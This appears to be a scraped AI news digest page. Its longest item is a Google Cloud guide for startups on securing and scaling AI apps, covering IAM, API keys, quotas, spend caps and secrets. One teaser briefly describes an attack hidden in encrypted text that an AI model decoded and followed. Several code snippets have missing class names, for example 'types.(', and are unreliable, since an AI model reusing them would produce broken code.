DataAIHub Daily

Archive →

August 20, 2026

37 curated AI news stories from leading AI companies.

Google

August 20, 2026

Google’s AI coding agent just escaped its own IDE

When Google launched Antigravity in November 2025, it was on the premise that developers could hand an entire coding task The post Google’s AI coding agent just escaped its own IDE appeared first on The New Stack.

Read original article

Google

August 20, 2026

Adobe Firefly adds AI audio tools and Google's Gemini Omni Flash

Adobe is making three AI audio tools broadly available in Firefly. Generate Music, Generate Speech, and Generate Sound Effects create royalty-free music, voiceovers, and sound effects for video projects. Adobe has also added Gemini Omni Flash to the platform. The article Adobe Firefly adds AI audio tools and Google's Gemini Omni Flash appeared first on The Decoder.

Read original article

Google

August 20, 2026

Google gives publishers a new way to fight AI-driven traffic losses

Google is giving publishers a new button that lets readers make them a preferred source across Search, Discover, and Google News, potentially boosting their traffic as AI search sends fewer clicks to the web.

Read original article

Google

August 20, 2026

Galaxy S26 FE Will Reveal Which Phones Get Google’s Free Upgrade

Will Samsung's new Galaxy S26 FE get Gemini Intelligence? The answer will reveal exactly which Galaxy phones Google's transformative new AI actually supports.

Read original article

Databricks

August 20, 2026

Busting SQL Migration Myths: How New SQL Features Make Lift-and-Shift to Lakehouse Easier

Somewhere in your warehouse, hundreds of stored procedures wake up every night and...

Read original article

xAI

August 20, 2026

Grok keeps sending gibberish responses to users

Affected users told TechCrunch they were using Grok Lite, and noticed the issues as early as Wednesday morning.

Read original article

Google

August 20, 2026

Expanding Google Antigravity for enterprise customers

Since announcing Google Antigravity in Gemini Enterprise Agent Platform at I/O in May, we’ve heard helpful feedback from our customers. Your developers want easy access to coding agents across surfaces. Your enterprise governance team wants security controls and license management. And your finance team wants pooled usage so that no prepaid token ever goes unused. Now, everybody finally gets what they want: Antigravity is available now as part of eligible Gemini Enterprise app subscriptions, including out-of-the-box administrative and spend controls. New IDE extensions let developers use Antigravity in the IDEs of their choice, including VS Code. Unify AI developer tools and enterprise-grade controls in one subscription Equipping your developers with advanced agentic tools shouldn't mean managing separate add-on licenses, invoices, billing consoles or security settings. With AI developer tools included in Gemini Enterprise subscriptions, administrators can easily enable Antigravity and Android Studio for users with eligible Gemini Enterprise Standard, Plus, and Standard Emerging Market licenses, and maintain full governance with spend, security, observability and usage metrics consolidated in the Gemini Enterprise admin console. Unblock your developers while controlling spend With billing flexibility and cost management tools in Gemini Enterprise, you can ensure your developers have the resources they need while managing costs: Granular spend thresholds: Administrators can set monthly project-level budget caps directly in the Billing console, with additional per-user and team controls rolling out later this year. Pooled quotas: Shared token pools provide flexibility to high-demand teams, preventing purchased quota from sitting idle across the organization. Overage enablement: To maintain continuous developer workflows when pooled quotas are met, administrators can opt into overages with monthly spend caps, smoothly transitioning excess usage to standard consumption-based rates. Usage metrics: Centralized usage tracking provides visibility into token consumption, API calls, and developer activity, enabling organizations to continuously optimize their AI investments. Safeguard your organization’s code and data with built-in privacy and security Gemini Enterprise subscriptions bring Google Antigravity under Google Cloud’s standard security and compliance protections. Administrators and IT teams can set clear boundaries around workspace access, enable full audit logging, and enforce data privacy from a single console: Configurable security policies: Enforce security and compliance controls, such as workspace sandboxing, and browser and MCP server access, to help ensure AI agents operate safely within authorized enterprise environments. Central audit logging: Enable comprehensive audit logging with a single toggle, capturing prompts, agent responses, and metadata for compliance reporting. Data privacy: Maintain data ownership under Google Cloud’s Terms of Service, ensuring all agent activity executes strictly within your secure cloud boundary. Antigravity in Gemini Enterprise - AI Developer Tools Settings Bring agentic coding directly into your team’s preferred development environments Starting today your developers can use Antigravity across the surfaces they already know and use — including Visual Studio Code, Visual Studio (preview), Jetbrains (preview) and Zed IDEs (preview) via the new IDE extensions as well as the Antigravity 2.0 desktop app, and the Antigravity CLI. Throughout all surfaces, administrators can enforce corporate identity standards while removing setup friction for technical teams via native support for Workforce Identity Federation (WIF) and Application Default Credentials (ADC). AGY IDE extension demo What our customers are saying From rapid code generation to end-to-end task automation, Google Antigravity is giving engineering teams the momentum of cutting edge AI development backed by the stability, governance, and scale of Google Cloud. Here is how leading enterprise customers and partners are driving measurable outcomes in production: “Deploying Antigravity in Gemini Enterprise allows Accenture to arm our engineers with Google DeepMind’s premier technology on the secure, trusted foundation of Google Cloud. Abstracting away operational complexity ensures our teams don't have to choose between developer speed and enterprise-grade governance — freeing them to deliver high-velocity engineering and transformative value for our clients.” — Chetna Sehgal, Global Practice Lead, Accenture Google Business Group “At AirAsia and across the Group, we’re all about empowering our people. Bringing highly capable Gemini models directly into our daily workflows with Antigravity 2.0 does exactly that. We are putting the most advanced AI capabilities into the hands of our entire workforce, from software engineering to finance, marketing, legal, HR and much more. This empowers both our developers and critical back-office teams to innovate at an unprecedented pace and drive proven time-savings across the board.” — Nikunj Shanti, CTO, AirAsia Next “Enterprises are moving beyond AI experimentation and expecting measurable business outcomes. With Gemini Enterprise and next-generation developer tools like Antigravity 2.0 and Antigravity CLI, we see significant opportunities to further embed agentic AI, particularly the advanced reasoning capabilities of Gemini models, directly into software delivery workflows. This goes beyond productivity as it enables faster decision-making, higher code quality, and reduced technical debt at scale. What stands out is how these capabilities are helping our teams evolve from writing code to orchestrating outcomes, strengthening every phase of the software development lifecycle while scaling innovation securely and responsibly.” — Rakesh Aerath, President, Asia Pacific Global Delivery Centers of Excellence, CGI “Every developer workflow is unique, and agentic AI should adapt to the engineer, not the other way around. With Google Antigravity supported across developers' preferred IDEs, the desktop app, and the CLI, Cognizant can seamlessly embed agentic engineering across our global delivery centers. It gives our teams the freedom to choose their preferred surface while delivering high-velocity, secure software for our clients.”— Rajesh Varrier, President, Global Operations and Chairman & Managing Director, Cognizant India “Antigravity has played a key role in advancing our AI-first strategy at Datamatics. Over the last few months, our teams have used it to rapidly build and deploy multiple applications, accelerate solution development, and embed AI into core business processes. From AI Impact Hub to analytics and sales enablement solutions, it has helped us move beyond experimentation to real execution, delivering measurable business outcomes while enabling teams to innovate faster and at scale.”— Vijay Venkatachalam, Vice President, Information Systems Group (ISG), Datamatics "Embedding Google Antigravity's autonomous capabilities directly into Gemini Enterprise development environments allows our internal and Forward Deployed Engineering teams to automate complex tasks. Supported by the platform’s new FinOps and governance controls, our teams can confidently focus on orchestrating high-value, secure and cost-efficient outcomes for our clients at scale." — Faruk Muratovic, US AI & Engineering Strategy and Services Leader, Deloitte “Adopting Antigravity places Wipro at the leading edge of the AI-driven software development lifecycle. Combining Antigravity 2.0, CLI, and the new IDE extensions with a seamless developer experience and superior code accuracy fits naturally into our AI-first engineering strategy. Working with Google Cloud allows us to accelerate software delivery and bring next-generation value to our global enterprise clients.” — Debashish Ghosh, Vice President and Global Head, Google Partnership, Wipro Get started with Antigravity in Gemini Enterprise Google Antigravity in Gemini Enterprise is available today for eligible Gemini Enterprise Standard, Plus, and Standard Emerging Market licenses, with broader support coming soon. For administrators: Visit the enterprise setup guide to enable AI Developer tools for Google Antigravity and Android Studio. For developers: Start building with Antigravity 2.0, the Antigravity CLI, or your preferred IDEs via Antigravity IDE extensions.

Read original article

xAI

August 20, 2026

Ers hid an attack inside AES encryption. The AI model cracked it open willingly.

Security filters are designed to catch malicious instructions before an AI model can act on them. Researchers at AI security The post Researchers hid an attack inside AES encryption. The AI model cracked it open willingly. appeared first on The New Stack.

Read original article

Meta

August 20, 2026

Meta brings Pocket, an app that lets you vibe-code and share games, to US users

Meta is bringing Pocket, its experimental AI-powered app for creating and sharing interactive games, to users across the U.S. after quietly testing it in Brazil.

Read original article

Google

August 20, 2026

How Alloy DB Sca NN scales vector search to 10 billion vectors

To satisfy the demands of enterprise-grade agentic AI applications, underlying vector databases often struggle to scale effectively as modern use cases can scale to billions of vectors. As a fully managed PostgreSQL-compatible database service, AlloyDB is engineered to handle demanding enterprise workloads. Combining Google's infrastructure with the reliability of commercial databases, it delivers high availability, scalability, and includes a cutting-edge analytical engine, optimal for agentic AI use cases. A key part of this is its ScaNN index, which now operates efficiently at a scale of 10 billion vectors. This was achieved through a major architectural enhancement: an innovative four-level tree (preview) paired with efficient memory usage. The 10 billion vector scale challenge Scaling to a 10 billion vector workload presents significant memory and computational challenges. Previous AlloyDB ScaNN tree-based index was limited to two- or three-level tree configurations, and attempting to scale those structures led to several bottlenecks: Increased compute intensity: Larger tree structures demand significantly more operations for both index construction and query traversal. Memory constraints: The sampling processes required for 10 billion vectors can easily exceed the system's available memory capacity. Solution: Four-level architecture The introduction of a four-level tree (preview) is the primary innovation in the recent AlloyDB ScaNN release. This architecture, illustrated in Figure 1, employs a top-down strategy to optimize the balance between accuracy and build efficiency. To maintain high performance and mitigate recall loss, the system integrates key enhancements such as Top-K branch, SOAR, centroid adjustment and balanced tree shape. Figure 1. AlloyDB ScaNN four-level tree architecture This design has two primary benefits: 1. Reduced compute intensity via hierarchical partitioning The four-level architecture drastically reduces compute intensity by using hierarchical partitioning to restrict the volume of vectors scanned during a query. Instead of traversing a flat or poorly segmented space, the multi-layered hierarchy narrows down the search path exponentially. Figure 2 illustrates the search spaces across different tree levels, demonstrating how structural layering optimizes traversal efficiency: Figure 2. Search space for two-, three- and four-level trees Two-level: Utilizes coarse partitioning to guide queries, resulting in a basic search complexity of O(N1/2). Three-level: Introduces an intermediate layer to further subdivide clusters, narrowing exploration to O(N1/3). Four-level: Implements refined, highly granular partitions that optimize traversal efficiency down to O(N1/4), sufficiently allowing for more than 10-billion vectors. By dynamically expanding hierarchical layers as the dataset expands, AlloyDB ScaNN maintains ultra-low query latency and avoids computational scale walls from impacting performance. 2. Efficient memory usage Achieving a 10 billion vector scale requires high memory efficiency. AlloyDB ScaNN uses these strategies to maximize memory management performance: Balanced tree shape construction: The four-level tree utilizes a balanced configuration to circumvent memory limitations that restrict the size of training datasets. This balanced architecture effectively leverages reduced sampling sizes to construct high-fidelity tree partitions. Sampling optimization: When the system encounters memory limitations, it generates a condensed sampling set that considers performance and accuracy. Performance test results By leveraging the innovative four-level tree architecture in our internal tests, we are able to achieve the following performance results: AlloyDB can scale to over 10 billion vectors with its ScaNN index. AlloyDB can deliver <= 51 ms p95 latency and 95% recall at 10 billion vectors with its ScaNN index. Get started today Experience AlloyDB ScaNN's four-level tree (preview) architecture today. You can deploy ScaNN for AlloyDB by following our quickstart guide to set up an instance. For optimized, high-speed vector search, refer to the official ScaNN documentation. New users can also explore AlloyDB through our 30-day free trial program. We can’t wait to hear about what you build!

Read original article

Google

August 20, 2026

10 questions every startup should answer before moving to production with their AI prototype

It’s never been easier to start an AI-powered startup on Google Cloud. You grab an API key from Google AI Studio at breakfast, paste it into Antigravity, and by lunch you’ll have a nascent prototype of your product. But it’s not all one straight line to progress. It's common to bump into these three challenges as you build out your stack: A leaked API key racks up a large bill in 48 hours. A "quick" migration from AI Studio to Gemini Enterprise Agent Platform stalls the roadmap for weeks because nobody on the team owns Identity and Access Management (IAM). The launch works, until the app starts returning HTTP 429 Too Many Requests because of default per-project quotas, and there's no clean path to more capacity without paying a premium. None of these are unique edge cases. . They're default failure modes of moving fast without a plan, and we've all done it at least once. Below are the 10 questions every startup should be ready to answer before they scale, grouped into the three phases where decisions can shape your future: Onboard (setting up your own projects and identities right) Scale (getting more throughput without breaking the bank) Govern (keeping costs, keys, and agents from running away). Each question ends with a short, runnable snippet you can copy into your own project today. These ten are scoped to the prototype-to-production transition itself. Adjacent decisions that matter just as much but aren't specific to that move, your data layer and RAG architecture, CI/CD, network design, are deliberately out of frame here. Onboard: get the foundation right (in the first hour). #1 Where should I start: Google AI Studio or Gemini Enterprise Agent Platform? Both surfaces expose the same Gemini family of models, but they solve different problems. Google AI Studio (with the Gemini Developer API) is the fastest path from an idea to working code. A browser IDE, an API key, a generous free tier, and no cloud project to configure. It's where most ideas should start, and Google's own guidance says as much. Gemini Enterprise Agent Platform (formerly Vertex AI) has the same Gemini models (plus 3rd party and OSS ones) with enterprise controls around them: IAM and service-account auth instead of raw keys, VPC Service Controls, Cloud Logging and Monitoring, reserved capacity, regional endpoints, and the compliance surface your first enterprise customer's security review will ask about. The right answer for most startups is both, sequenced deliberately: first prototype in AI Studio, then migrate before you have real users. The danger for startups is treating them as interchangeable solutions, AI Studio's simple key model does not translate to enterprise controls, and Agent Platform's IAM model might look like overkill until the day it saves you from a stolen-credential incident. It's less work than it sounds like. The unified google-genai SDK targets both: code_block <ListValue: [StructValue([('code', '# Prototype: Google AI Studio, raw API key\r\nfrom google import genai\r\nclient = genai.Client(api_key="YOUR_AI_STUDIO_KEY")\r\n\r\n# Production: GEAP, no key — uses Application Default Credentials (ADC)\r\nfrom google import genai\r\nclient = genai.Client(\r\n vertexai=True,\r\n project="my-startup-prod",\r\n location="us-central1",\r\n)\r\n\r\nresp = client.models.generate_content(\r\n model="gemini-2.5-pro",\r\n contents="Summarize this contract in three bullets.",\r\n)\r\nprint(resp.text)'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb6073c6850>)])]> The rule of thumb: the day you have users who are not you or your startup colleagues, you should already be on Gemini Enterprise Agent Platform. #2 How do I set up a Google Cloud project without becoming an IAM expert? The biggest reason startups stall on the migration to Agent Platform isn't the code, it's the operational leap from "here's an API key" to a cloud project with folders, service accounts, org policies, logging, and IAM bindings. If your team doesn't have a dedicated cloud admin, that first project setup can eat a week of engineering time. Three moves cut that dramatically: Use an opinionated project template instead of clicking through the console. The Cloud Setup checklist and the Google Cloud Architecture Framework give you a production-grade folder hierarchy (prod / non-prod / dev), a central logging + monitoring project, Security Command Center turned on, and baseline org policies, without you having to design them from scratch. Enable the APIs you'll actually use, once. Batch it so you're not doing it project-by-project when you need it. The billing-link step is not optional. Every paid API you're about to enable will refuse to activate on a project with no billing account attached, so we handle that first. Let Gemini pick the roles, but ask it for the narrow ones. You don't have to memorize the roles reference. In the Grant access dialog, Help me choose roles lets you describe the task in plain language, "this service account needs to call Gemini models and read one Cloud Storage bucket", and get predefined roles back with the reasoning shown. One catch worth knowing on day one: by default it suggests roles that cover common journeys, which usually means a service's Admin, Editor, or Viewer. Those are broader than you want. Say "least privileged" or "narrowest access" in the prompt and it returns granular roles instead. Same amount of typing, considerably smaller blast radius when a credential leaks.Sources: Get predefined role suggestions with Gemini assistance code_block <ListValue: [StructValue([('code', '# One-shot: create a Vertex-ready project and turn on the services a\r\n# typical AI startup uses.\r\ngcloud projects create my-startup-prod --name="My Startup (prod)"\r\ngcloud config set project my-startup-prod\r\n\r\n# REQUIRED before enabling billing-dependent APIs (aiplatform, run, etc.).\r\n# Use `gcloud billing accounts list` to find your billing account ID.\r\ngcloud billing projects link my-startup-prod --billing-account=012345-6789AB-CDEF01\r\n\r\ngcloud services enable \\\r\n aiplatform.googleapis.com \\\r\n run.googleapis.com \\\r\n artifactregistry.googleapis.com \\\r\n logging.googleapis.com \\\r\n monitoring.googleapis.com \\\r\n secretmanager.googleapis.com \\\r\n cloudbilling.googleapis.com'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb607280c50>)])]> Sources: gcloud services enable reference, · gcloud billing projects link (GA), GE Agent Platform environment setup. If you're a solo founder, resist the urge to build in your personal GCP account. Create a proper organization or self-owned org first, then create the project inside it. That single decision can make everything else, fromIAM to billing and audit, dramatically easier. #3 I'm on Google Cloud, how should my code actually authenticate: API keys, service accounts, or user credentials? There's a hierarchy of safety here, and the easiest option is rarely the right one in production. Raw API keys are fine for local prototyping. They are dangerous in production because they are long-lived, easy to leak into a client bundle or a public repo, and grant unbounded access until you notice. User credentials via OAuth (application default credentials) are best for interactive tools, CLIs, and any code that runs on a developer's laptop. Service accounts with least-privilege IAM roles are the right answer for anything running on a server, in a container, or in a scheduled job. The pattern you're aiming for is one where your code never sees a key at all. It just calls the Google Auth library, which quietly reads Application Default Credentials (ADC) from the environment, a short-lived token minted for whichever service account is attached to your Cloud Run service, GKE workload, or Compute Engine VM. You get enterprise-grade auth without writing any auth code. code_block <ListValue: [StructValue([('code', '# On a developer laptop\r\ngcloud auth application-default login\r\n\r\n# On a server (Cloud Run, GKE, etc.) — no login, no key file.\r\n# Attach a service account with just the roles the app needs.\r\ngcloud run deploy my-agent \\\r\n --image=us-docker.pkg.dev/my-startup-prod/agents/api:v1 \\\r\n --service-account=agent-runtime@my-startup-prod.iam.gserviceaccount.com \\\r\n --region=us-central1'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb607282b50>)])]> code_block <ListValue: [StructValue([('code', '# Application code — notice: no keys, no secrets.\r\nfrom google import genai\r\n\r\nclient = genai.Client(\r\n vertexai=True,\r\n project="my-startup-prod",\r\n location="us-central1",\r\n)'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb6072828d0>)])]> Do one last favor to your future self: give that service account the minimum IAM role your workload actually needs, usually roles/aiplatform.user for calling models, not the broader admin roles. It takes an extra 30 seconds and prevents the credential from becoming a master key if it leaks. #4 When should I actually stop procrastinating and migrate from AI Studio's API key to Agent Platform's IAM model? Sooner than you'd like, and the correct trigger is not when it breaks. It's when any of these is true: Your key has left your laptop (checked into a repo, pasted into a Slack, shipped in a mobile app). You have more than one person on the team who needs to call the API. You're spending more than a few hundred dollars a month. You're about to onboard paying customers. A potential pitfall that can catch growing startups off guard is simple: a leaked Gemini API key on an account that normally spends $180 a month gets scraped from a public repo and used to run distillation attacks, accumulating tens of thousands of dollars in charges before the owner even sees the first billing alert. The Google Cloud Shared Responsibility Model is unambiguous: the customer is liable for charges incurred with their own valid credentials. The migration itself is genuinely smaller than the anxiety around it. In google-genai it's the two-line change shown in #1. What takes real time is the project setup around it, which is exactly why #2 exists. Practical checklist for cutover day: code_block <ListValue: [StructValue([('code', '# 1. Revoke every existing AI Studio key that has ever left a laptop.\r\n# (Go to https://aistudio.google.com/apikey and delete them.)\r\n\r\n# 2. Confirm your production code has no api_key= arguments.\r\ngrep -rn "api_key" src/\r\n\r\n# 3. Enable GEAP and confirm ADC works locally.\r\ngcloud services enable aiplatform.googleapis.com\r\ngcloud auth application-default login\r\npython -c "\r\nfrom google import genai\r\nc = genai.Client(vertexai=True, project=\'my-startup-prod\', location=\'us-central1\')\r\nprint(c.models.generate_content(model=\'gemini-2.5-flash\', contents=\'ping\').text)\r\n"'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb60725d390>)])]> If step 3 prints a response, you're on Agent Platform. Phase B, Scale: get more capacity without paying a premium. #5 Now that I'm shipping, why on earth am I getting all these HTTP 429 errors, and how do I make them stop? 429 Too Many Requests from Agent Platform almost always means one of two things: You've hit the Dynamic Shared Quota (DSQ) ceiling for your project's tier. DSQ is a shared pool sized against your project's history, new projects start with modest limits by design, to prevent abuse across the platform. You're calling a global endpoint during a global demand spike, competing with worldwide traffic for shared capacity. The instinctive reaction is to file a quota-increase ticket. You can do that if you must, but two architectural moves usually solve the problem faster and cheaper. Pin to a regional endpoint. Over half of startup traffic on Agent Platform defaults to global routing. Pinning to a specific region (say us-central1) sidesteps global contention and typically improves latency at the same time. (One narrow exception, which we'll get to in the next question: if you specifically want Priority PayGo, that feature currently only ships on the `global` endpoint. For everything else, pin regionally.): code_block <ListValue: [StructValue([('code', 'from google import genai\r\n\r\n# Global (default): competes against worldwide demand.\r\n# Regional: routes only to the regional cluster, less contention.\r\nclient = genai.Client(\r\n vertexai=True,\r\n project="my-startup-prod",\r\n location="us-central1", # <-- this is the one-line fix\r\n)'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb60725ea50>)])]> Add real retry and backoff. A 429 is a retryable signal, not a fatal error. Any production client should have exponential backoff with jitter. The modern google-genai SDK ships this behavior built in, but only if you actually enable it. This is easy to overlook. Don't reach for the classic `google.api_core.retry.if_transient_error` decorator you may have seen on older Vertex code. It's designed for the legacy exception classes and does not recognize the new `google.genai.errors.APIError, so it will silently pass 429s through without retrying. Use the SDK's built-in retry options instead: code_block <ListValue: [StructValue([('code', 'from google import genai\r\nfrom google.genai import types\r\n\r\nclient = genai.Client(\r\n vertexai=True, project="my-startup-prod", location="us-central1",\r\n http_options=types.HttpOptions(retry_options=types.HttpRetryOptions(\r\n attempts=5, initial_delay=1.0, max_delay=60.0, exp_base=2.0, jitter=1.0,\r\n http_status_codes=[408, 429, 500, 502, 503, 504],\r\n ))\r\n)'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb60725e110>)])]> How do you see this coming? Preferably not from a user telling you. Agent Platform publishes serving metrics to Cloud Monitoring, and there is a prebuilt dashboard you don't have to assemble: Console → Agent Platform → Dashboard → Model observability. It gives you requests per second, token throughput, first-token latency, and error rates out of the box. The metric to actually alert on is aiplatform.googleapis.com/publisher/online_serving/model_invocation_count. It carries an error_category label with values of user, system, or capacity. Alerting on capacity isolates genuine throttling from your own bad requests, which a raw 429 count won't do. One thing worth internalizing, because it trips people up: you cannot build a "warn me at 80% of my quota" alert for Standard PayGo. Under Dynamic Shared Quota there is no fixed per-project number to be at 80% of. A 429 means transient contention for shared capacity, not that you crossed a line. Percent-of-limit alerting only becomes meaningful once you're on Provisioned Throughput, which does expose real limit metrics. code_block <ListValue: [StructValue([('code', 'gcloud monitoring policies create --policy-from-file=capacity-alert.yaml'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb60725e950>)])]> Sources: Agent Platform metrics list, Model observability dashboard, RetryOptions source, core retry_base.py, genai errors.py, reduce 429 errors, gcloud monitoring policies create, Dynamic Shared Quota. Follow the Agent Platform rate limits documentation to understand what your project's current ceiling actually is before you assume you've outgrown it. #6 Which consumption mode do I pay for: Standard PayGo, Priority PayGo, or Provisioned Throughput? Three consumption models, three completely different workload shapes, and three completely different ways to proceed. Picking the right one can help startups see meaningful savings on AI bills. First let’s define them and then see when they are, or aren’t, a good fit: Standard PayGo (DSQ): Pay per token from a shared pool; cheap, no guarantees.Priority PayGo: Pay per token at a premium to jump the queue.Provisioned Throughput (PT): Prepay for reserved capacity; predictable, use it or lose it. Consumption type Best for Watch out for Standard PayGo (DSQ) Early-stage, low-QPS, spiky prototype traffic 429s during spikes; no reliability SLO Priority PayGo Bursty, revenue-critical traffic that can't tolerate 429s Roughly 1.8x the standard token price Provisioned Throughput (PT) Steady, predictable, high-volume production traffic Wasted spend if utilization is under ~40%; overflow to PayGo on spikes The dominant startup mistake is buying PT too early. Usually this happens the week after a big launch when it feels like traffic will only ever go up. PT is reserved capacity. You pay whether you use it or not, and it only starts paying you back once your baseline is genuinely predictable, not just aspirational. Here’s a pragmatic sequence: Weeks one through four on Standard PayGo. Use it to measure your real request shape (tokens per minute at p50 and p99, request bursts, batchable vs. real-time split). When you get your first bad 429 storm, flip on Priority PayGo for the traffic that actually matters. It's a config change, not a purchase order, nobody in procurement needs to be involved: code_block <ListValue: [StructValue([('code', '# Priority PayGo request: use the global endpoint + two extra headers.\r\nfrom google import genai\r\nfrom google.genai import types\r\n\r\nclient = genai.Client(vertexai=True, project="my-startup-prod", location="global")\r\nresp = client.models.generate_content(\r\n model="gemini-2.5-pro",\r\n contents="Rank these support tickets by urgency: ...",\r\n config=types.(\r\n # Priority PayGo headers, per current GEAP docs.\r\n http_options=types.HttpOptions(headers={"X-Vertex-AI-LLM-Request-Type": "shared", "X-Vertex-AI-LLM-Shared-Request-Type": "priority"}),\r\n ),\r\n)'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb60725fa10>)])]> 3. Once you can predict your baseline TPM, buy PT to cover the flat baseline and let anything above it overflow to PayGo. That's the combined pattern Google recommends for exactly this reason. Best of both worlds, not marketing spin. Sources: Priority PayGo docs, google-genai HttpOptions source, GEAP REST reference. #7 Which of my requests actually need to be live, and which should be batch jobs? Most startup workloads are secretly batch jobs pretending to be real-time. Every one you move off the interactive path frees up DSQ headroom for the traffic that genuinely needs to be fast, the traffic where a user is actually watching a spinner. Three questions to help you sort your traffic: Does a human have to see the result within a second? That means: Live inference. Can the user wait a few seconds and see a spinner? That means: Still live, but a candidate for streaming. Would the user tolerate "we'll email you when it's ready" or "check back in a bit"? That means: Batch prediction. Batch prediction on Agent Platform runs in a completely separate queue, does not consume your interactive DSQ, and is typically about half the price of on-demand inference. That's a rare double win: faster live traffic and a lower bill. code_block <ListValue: [StructValue([('code', '# Kick off a batch prediction job from a JSONL file in Cloud Storage.\r\n# Each line is one prompt; results land in another Cloud Storage prefix.\r\nfrom google import genai\r\nfrom google.genai import types\r\n\r\nclient = genai.Client(vertexai=True, project="my-startup-prod", location="us-central1")\r\n\r\njob = client.batches.create(\r\n model="gemini-2.5-flash",\r\n src="gs://my-startup-prod-batch/inputs/nightly-summaries.jsonl",\r\n config=types.(\r\n dest="gs://my-startup-prod-batch/outputs/",\r\n ),\r\n)\r\nprint(job.name, job.state)'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb60725c650>)])]> Common candidates: nightly document summarization, background classification of new signups, bulk translation, embedding backfills, evaluation runs against your test set. If any of those are on your live path today, moving them is often the single highest-leverage change you can make this week. Govern: Keep costs, keys, and agents under control. #8 How do I set spend caps that actually reduce cost, and not just send me polite emails while my bill triples? Until recently the honest answer was that budgets only notify, and you had to build your own brake pedal. That changed in July. There are now three mechanisms, and you should think of them as layers. A spend cap budget (Preview). Cloud Billing budgets can now enforce rather than just email. Set a spend cap on a project and, when usage costs cross 100% of the budget, Google pauses the service until you manually lift it. Agent Platform is explicitly on the eligible list, alongside the Gemini API, Cloud Run, and Cloud Run functions. Alerts still fire at 50% and 80%, so the pause isn't a surprise. Three things to know before you rely on it: Each cap covers one project and one eligible service. It is not account-wide protection. If you want Agent Platform and Cloud Run both capped, that's two caps. Enforcement is not instant and is based on estimated costs. Overages past the cap are billed as normal, so set the number below your real ceiling. Lifting it is manual, and service resumption can take up to an hour. It also pauses Provisioned Throughput usage, so if you've prepaid for capacity, a cap hit stops that too. It's in Preview as of publication, and the eligible-service list is documented as growing. Check the current list before you design around it. 2. A billing budget with a Pub/Sub trigger that disables billing. Still the right tool when you need blast radius the spend cap can't give you: multiple services at once, an entire project, or a service that isn't eligible yet. When the budget hits a threshold, Pub/Sub fires a Cloud Function that detaches the billing account, which stops all billable activity within minutes. Blunter and more dangerous than the native cap — it can leave resources unrecoverable — so reach for it second, not first. Full walkthrough: Automatically respond to budget notifications. code_block <ListValue: [StructValue([('code', '# Sketch: create a budget SCOPED TO ONE PROJECT that publishes to Pub/Sub at 50%, 90%, 100%.\r\ngcloud billing budgets create \\\r\n --billing-account=012345-6789AB-CDEF01 \\\r\n --display-name="my-startup-prod hard stop" \\\r\n --budget-amount=2000USD \\\r\n --filter-projects=projects/my-startup-prod \\\r\n --threshold-rule=percent=0.5 \\\r\n --threshold-rule=percent=0.9 \\\r\n --threshold-rule=percent=1.0,basis=current-spend \\\r\n --notifications-rule-pubsub-topic=projects/my-startup-prod/topics/budget-alerts'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb60725e6d0>)])]> Sources: Manage spend cap budgets, Set up programmatic notifications gcloud billing budgets create reference, Cloud Billing budgets concepts, Disable billing with notifications walkthrough, Programmatic notification payload schema. Two things to get ahead of for, as the defaults can cause unexpected issues: Limit your budget scope: Without --filter-projects, your budget applies to your entire billing account. A spike in any project will trigger the kill switch for everything. Deploy locally: The budget notification doesn't specify which project is affected. To ensure the kill switch only affects the intended project, deploy your Cloud Function in the same project you're protecting (e.g., my-startup-prod). Then wire up a tiny Cloud Function to that topic that calls projects.updateBillingInfo to unlink the billing account when the 100% threshold fires. That is your circuit breaker. Mechanical ceilings via quota overrides. Even if you never set up the above kill switch, you can cap the rate at which cost can accumulate by setting explicit per-model, per-region quotas below the platform default. If your app never legitimately needs more than 500 requests per minute for gemini-2.5-pro, cap it there in the Cloud Quotas console, a leaked key can't burn what the quota flatly refuses to serve. #9 Where should I actually keep secrets? (Not in .env files!) The short answer is: Secret Manager. Not in environment variables, not in .env files, and never in your repo. Grant read access via IAM only to the service account that needs it. code_block <ListValue: [StructValue([('code', '# Store a third-party API key (Stripe, OpenAI, whatever).\r\necho -n "sk_live_xxx" | gcloud secrets create stripe-live-key --data-file=-\r\n\r\n# Grant only the runtime service account access to read it.\r\ngcloud secrets add-iam-policy-binding stripe-live-key \\\r\n --member=serviceAccount:agent-runtime@my-startup-prod.iam.gserviceaccount.com \\\r\n --role=roles/secretmanager.secretAccessor'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb60725f890>)])]> code_block <ListValue: [StructValue([('code', '# Application code fetches it at startup; nothing lives on disk.\r\nfrom google.cloud import secretmanager\r\nsm = secretmanager.()\r\nresp = sm.access_secret_version(\r\n name="projects/my-startup-prod/secrets/stripe-live-key/versions/latest"\r\n)\r\nstripe_key = resp.payload.data.decode("utf-8")'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb60725c710>)])]> Then two little disciplines that pay for themselves the first time you need them: Rotation on a schedule and on suspicion. Secret Manager versions are cheap; treat them as immutable and roll forward. Detection when a secret leaks. Secret Manager notifications and Google Cloud's Sensitive Data Protection can catch keys checked into a repo or pasted into a log stream, before an attacker does. For any AI application that acts on a user's behalf, calls Gmail on their behalf, reads a Drive folder, hits a third-party SaaS with the user's credentials, do not store a long-lived token. Use OAuth 2.0 with short-lived access tokens and a refresh flow, so that when a user rage-quits or a compromised account gets revoked, the agent loses access at the same time. #10 How do I stop my brand new AI agent from doing something it absolutely shouldn't? An agent that can call tools, browse the web, or execute code needs the same defense-in-depth thinking as any other production service, arguably more, because it makes decisions that neither you nor the model can fully predict in advance. Four layers, none optional once you have real users: 1. Identity for the agent itself. Give the agent its own service account, scoped only to the resources and tools it genuinely needs, the exact same least-privilege principle as any other workload. Agent Engine supports first-class agent identity so every action can be attributed to a specific agent instance in your audit logs. 2. Sandboxed code execution. If your agent runs generated code, a common pattern for data-analysis or "run this Python for me" flows, do not run it in your application process. Use an isolated sandbox so a bad combination can't touch your production data. code_block <ListValue: [StructValue([('code', '# Enable server-side code execution inside a 